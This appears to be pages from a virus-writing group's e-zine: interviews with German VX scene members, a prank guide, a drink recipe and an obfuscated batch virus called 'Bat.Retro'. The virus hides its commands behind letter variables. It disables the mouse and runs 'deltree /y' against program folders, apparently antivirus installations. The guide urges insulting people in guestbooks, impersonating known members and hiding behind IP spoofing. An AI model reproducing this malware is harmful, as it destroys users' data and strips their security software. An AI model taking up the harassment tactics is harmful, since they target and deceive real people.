Hmmm!? Es fing an als Viren, wie "Melissa" durch die Medien gingen (damals einer der am weitesten, schnellsten, etc verbreiteten Makroviren), im Internet fand ich auf einer Page den Quellcode und sonst auch anders nützliche Tools, die aus der VX-Szene stammen. Habe eine Menge mit den Tools und Quellcodes experimentiert und dazu gelernt, bis ich eines Tages andere VXer im IRC antraff... dr.g0nZo: Wie hast du das Programmieren gelernt, und was für Programmiersprachen kannst du? Necronomikon: Gelernt durch Bücher, Tutorials und andere Leute aus dem IRC! Basic's (Qbasic - power basic, bisschen WordBasic, Visual basic, VBA and VBS), HTML, assembler und ein paar Script languages. Aber zum grössten Teil benutze ich win32asm. dr.g0nZo: Welche Art Virii schreibst du hauptsächlich? Necronomikon: Ich schrieb schon alles mögliche an Viren unter win32asm, VBx (...HTML;))... dr.g0nZo: Bist du momentan in einer Group, wenn ja, welcher? Necronomikon: Zur Zeit bin ich Member bei Zero Gravity. dr.g0nZo: Ok, ich glaub, dass sind genug Fragen, willst du noch jemanden grüßen? Necronomikon: Grüßen kann ich viele Leute... Hmmmm!? SnakeByte und jackie/MATRiX Danke für eure Hilfe in allen Lebenslagen... ! ;) Serial Killer Grüsse Frau und Kind von mir!!! alle aus #german_vir, wie Malfunction, mgl, doop, ....., und Ober Pussyhunter Daniel- ;) Fii7e und ocker Wir sehen uns bestimmt die Tage nochmal. Lys Kovick without ya Word97.Blade would be nothing... Rhape79 Come back to #virus! prizzy We could talk again about the differences in spelling between polish and czech rudewords l8r in #virus.=o] Gigabyte Wodka + Redbull rulez... all on #virus, #vir, #zerogravity dr.g0nZo: Oder gibts noch irgendwas, dass du der Menschheit mitteilen willst? Necronomikon: Tja, wurde eigentlich alles gesagt. Frage an dich (Dr.G0nZo)! Hab ich dich schon mal in #virus getroffen oder war dies eine andere Person, die meinte kein Member von rRlf zu sein!? dr.g0nZo: Nein, tut mir leid, des war nicht ich. Aber irgendwann gehört die Welt anscheinend den dr.g0nZos! Necronomikon: Byez Necronomikon [Zer0Gravity]

articles

Interview mit rastafarie dr.g0nZo dr.g0nZo: ALO rastafarie! Wie gehts dir? rastafarie: ALO. Ja, ganz gut. Freu mich schon auf des Interview! dr.g0nZo: Wie wir wissen, willst du aus der rRlf austreten, wieso? rastafarie: War ne schöne Zeit, aber ich komme mir bei der Liberation Front mit meiner Tätigkeit ein wenig fehl am Platz vor. In der letzten Zeit gingen mir die Ideen aus, so dass ich zu dem Entschluss kam auszutreten. dr.g0nZo: Hört sich recht schwerwiegend an, denkst du schon lange drüber nach? rastafarie: Err ... Ja, seit dem ich in diesem kreativen Loch stecke. Ca. 1/2 Jahr schon. dr.g0nZo: Wohh, deine Bilder sind ziemlich gut, bekam schon fast einen Rausch bei längerer Betrachtung. Was, außer den Bildern, hast du noch gemacht? rastafarie: Also meine Tätigkeit war eine ziemlich interessante, ich hatte zahlreiche Projekte am laufen gehabt. U.a. mir eine Laetitia Casta jpg-Sammlung anzulegen und bin so zu einer respektablen, qualitativ hochwertigen Casta Sammlung gekommen von ner Größe um die 1235 files. dr.g0nZo: Auch ne Sache um die FLAT zu benutzen. Anderes Themagebiet. Bist du im Drug-Sport experienced (Rausch ;) ? rastafarie: Na ja ... Also mit der Zeit sammelt man da schon einige Erfahrungen... Ich meine ich habe einige meiner Bilder für die rRlf im absoluten Vollrausch gemacht... Hab ziemlich viele Ideen im Vollrausch gesammelt und einige auch mit PC realisiert. Das war auch schon vor meiner rR Zeit. Und vor ungefähr 4 Jahren ging es zusammen mit TeAgeCe los... dr.g0nZo: Der war ja auch mal bei uns... Wirst du im August philet0ast3r nach Amsterdam begleiten, zum VX Meeting? Als "Gang in die Wüste". rastafarie: Also ich denk es wär ein riesen Spass. Aber ich werde diese Zeit anderweitig nutzen um meine Bong-Skills zu verbessern. Dies wird wohl einmal mehr in Polen der Fall sein, wo sich rund um TeAgeCe (Gratz) und mich eine "kleine" Drogenszene etabliert hat. Große Kartoffelfelder, großer Rausch, riesen Spass... dr.g0nZo: Irgendwelche naschen Rauschstories? Wie bist du zu deinen Dreads gekommen? Haben dir Freunde den Kopf bearbeitet? rastafarie: Hehe ... Also mir würden nach längerem Überlegen sicher an die 23000 stories einfallen, aber mein Gedächtnis erlaubt es mir nicht spontan zu antworten ... [rRausch] :) Das mit meinen Dreads is so ne Sach ... Hab vor 3 Jahren beschlossen meine Haare lang wachsen zu lassen. Damals hatte ich an die 3-4 mm. Nun als ich eine Löwenmähne hatte, hab ich angefangen die Haare nicht mehr zu waschen, und beschloss mir ein Biotop auf den Schädel wachsen zu lassen, und es mit Kieselerde zu düngen. Ja und seit nem 3/4 Jahr hab ich ezad die Dinger auf dem Kopf. dr.g0nZo: Bist du politisch aktiv? Was hältst du von fuckin Schröder's Haartönung? *ggg* (it gets really gay now) rastafarie: Nun, um erstmal auf unseren stylischen Kanzler zu sprechen zu kommen... Ich finde schwules Wasserstoffblond würde unserem Gerhard auch gut stehen... Die ganze Debatte in den Medien, der Prozess gegen die DPA finde ich lächerlich... Hat nichts wichtigeres zu tun als uneingeschränkte Loyalität für seine Haarfarbe zu üben... Politisch aktiv bin ich eher weniger, freu mich schon aber auf den 22.-23.5. ... Wenn maestro W. Bush in Berlin ist... dr.g0nZo: Ja ja, da Bush Schorre ... Ich kann leider nicht mitfahren. Was treibst du so am Wochenende, bzw. an freien Tagen, wo gehst hin (Kneipen, Discos, ...)? rastafarie: Ist nich so mein Ding in Kneipen zu gehen oder durch Discos zu ziehen... Fahr meistens mit den anderen rRs und Freunden auf Konzerte ... Du weist ja, wovon ich rede... In meiner Freizeit treib ich nichts sonderlich sapnnendes, außer zu rRauschen, Basketball zu spielen oder ein wenig auf der Gitarre rumzuklimpern ... Bin gerade dabei mit ein paar Pendejos ne Band in die Welt zu setzen... [âlo Beso Negro] ... nächste Woche haben wir unseren ersten kleinen Auftritt, auf dem Gebtag von unserem Bassisten ... :-] dr.g0nZo: ... Oh, die Bratwürste verkohlen. Also wirst du noch keine Probleme mit Groupies haben, noch nicht. rastafarie: Na jaaa ... also nicht ganz ... Also vor einiger Zeit ... Vor heute 3 Wochen da hatt ich noch was mit ner geilen Blonden... Echt nobel ... => *wooow fresh* Sie hat eeo und mich am BB-Platz aufgegabelt... Was gestört hat waren nur ihre beiden Kinder ... =) dr.g0nZo: Moinst du die, die immer Mutter zu ihr sagten? rastafarie: héhé ... *fuuuuuck* dr.g0nZo: 0kAY. War ne nice Grillsession, die Welt wurde um nichts reicher, auf geistlicher Ebene. Danke für die Sach mit dem Jackass-Style kotzenden Hund, und für deine Zeit. Willst du noch Greetings unter die Leute bringen? rastafarie: Vrallé ... Greetings to all rR and ex-members and all phucked up borrachos from Beso Negro and everyone reading this article. Ähh, Casta Pics sharing: rastafarie@gmx.net

articles

Low cost advertisment at an higher l3vel dr.g0nZo Low cost advertisment at an higher l3vel ***************************************** by dr.g0nZo 1. Find a sucking guest-book. I suggest to take something like funky-needles.de.vu or u-Boot.com. But nothing such as the something awful forums! 2. Diss all the persons without a reason, make some nice advertisments for your site. Use an AKA that isn't named on it. 3. It's good to have a lot of those gb's, hey it's about using "guerilla-tactics", harm the others short 'n powerful, then escape. 4. After about a week or so return to the gb's, watch around. What were the results or replies top you? 5. In the most cases the replies are things like: "Who the f'n hell are you? Go away damn jerk!" Congratulations! Your first scandal! 6. Get to an higher level of "Kiddie-Terrorism". Use the AKA of a well known member, ahh, but before I guess you to esablish a call by call connection on your PC, and to download an ip-spoofer (www.gcf.de), hurting the psyche of very new Newbies is good to start. Hope you choiced the name of the most respected one ... 7. Later the "victim"/real owner of the name is going to learn you respect ... LOL Use his name again, two with the same AKA, hmm, could be really funny, or? Remember: A g-book of lamerz, not one of the scene! Don't know what to say more, but stay tricky and fake all those sunday-i-net useres! THX for reading, if you think, what I wrote is nonsens, tell me. dr.g0nZo

articles

stEamiNg RangeR - rRlf driNk dr.g0nZo hi folks! today, i´m introducing you into the world of cheap lower low cost mixtures, which we need for our brains to work. ;) if you´re thinking i´m silly, do so. that bores all. serious part: conditions: you need to have a party, hope there're some mafuckas who you spit at so it´s funnier for you to steal some whiskey. drugs are necessary. further you should have a bottle of jack daniels, cola and orangejuice... ok, mix that shit as following: 1/5 of the stolen bottle jackie 2/5 cola 2/5 from the orangejuice enjoy your unexpensive drink... another tip: take 1L becks, and 2G weed. mix it. wait about five minutes. drink it with friends

sources

Bat.Retro DvL ctty nul break off echo off set .=set %.% *..................=e %.% **.................=s %.% ***................=a %.% ****...............=o %.% *****..............=r %.% ******.............=b %.% *******............=f %.% ********...........=h %.% *********..........=t %.% **********.........=i %.% ***********........=c %.% ************.......=k %.% *************......=u %.% **************.....=d %.% ***************....=l %.% ****************...=n %.% *****************..=y %.% ******************.=m %.% *******************=v %*****..............%%*************......%%****************...%%**************.....%%***************....%%***************....%32 %******************.%%****...............%%*************......%%**.................%%*..................%,%**************.....%%**********.........%%**.................%%***................%%******.............%%***************....%%*..................% %*****..............%%*************......%%****************...%%**************.....%%***************....%%***************....%32 %************.......%%*..................%%*****************..%%******.............%%****...............%%***................%%*****..............%%**************.....%,%**************.....%%**********.........%%**.................%%***................%%******.............%%***************....%%*..................% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.3\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\z%****...............%%****************...%%*..................%%***************....%%***................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.4\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.5\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.6\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.7\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.8\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%*******************%g\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%*******************%p%*..................%%*****..............%%**.................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***********........%%****...............%%******************.%%******************.%%***................%%****************...%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*..................%%**.................%%***................%%*******............%%*..................%%****************...%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%%**********.........%%****************...%%**************.....%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-%******************.%%***................%%***********........%%*****..............%%****...............%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-p%*****..............%%****...............%%*********..........%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-p%*****..............%%****...............%%*********..........%95\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-%**.................%%*..................%%***********........%%*************......%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%w%**********.........%%****************...%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%w%**********.........%%****************...%32\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%************.......%%***................%%**.................%p%*..................%%*****..............%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%************.......%%***................%%**.................%p%*..................%%*****..............%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%******************.%%***********........%%***................%%*******............%%*..................%%*..................%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%******************.%%**.................%%***................%%*******************%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%***********........%%***********........%%**********.........%%***************....%%***************....%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%***********........%-%***********........%%**********.........%%***************....%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%******.............%%***................%%*******************%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%******.............%%***................%%*******************%w95\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%****...............%%****...............%%***************....%%************.......%%**********.........%%*********..........%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%*****..............%%*..................%%****************...%%**************.....%%******************.%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******************%%**.................%95\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.3\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.4\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.5\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.6\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.7\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.8\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%*******************%g\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%*******************%p%*..................%%*****..............%%**.................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%***................%%****************...%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**.................%%*****************..%%******************.%%***................%%****************...%%*********..........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%****...............%%****************...%~1\%***................%%*******************%p%**.................%%********...........%%***................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%****...............%%****************...%~1\%**.................%%*****************..%%******************.%%***................%%****************...%%*********..........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-p%*****..............%%****...............%%*********..........%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-p%*****..............%%****...............%%*********..........%95\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%%**********.........%%****************...%%**************.....%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-%**.................%%*..................%%***********........%%*************......%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%w%**********.........%%****************...%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%w%**********.........%%****************...%32\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\g%*****..............%%**********.........%%**.................%%****...............%%*******............%%*********..........%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%%**.................%p%*..................%%*****..............%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%%**.................%p%*..................%%*****..............%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%***********........%%***................%%*******............%%*..................%%*..................%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~2\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\p%***................%%****************...%%**************.....%%***................%%**.................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\q%*************......%%**********.........%%***********........%%************.......%%********...........%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%******.............%%***................%%*******************%\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%**********.........%%****************...%%*****************..%p%*..................%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%*..................%%****************...%%**************.....%%******************.%~1\ >%****************...%%*************......%%***************....% %**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%****...............%j%***................%%****************...%~1\ >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\%******************.%%*****************..%%**************.....%%****...............%w%****************...%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%pp%***************....%%*..................%j~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******.............%%*..................%%***................%%*****..............%%**.................%%********...........%~1\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%**************.....%%****...............%%****************...%%************.......%%*..................%~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%******************.%%*************......%%***************....%%*..................%\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\g%*****..............%%****...............%%************.......%%**.................%%*********..........%%*..................%%*****..............%\%******************.%%*****************..%g%*****..............%%****...............%%************.......%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%***********........%q\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 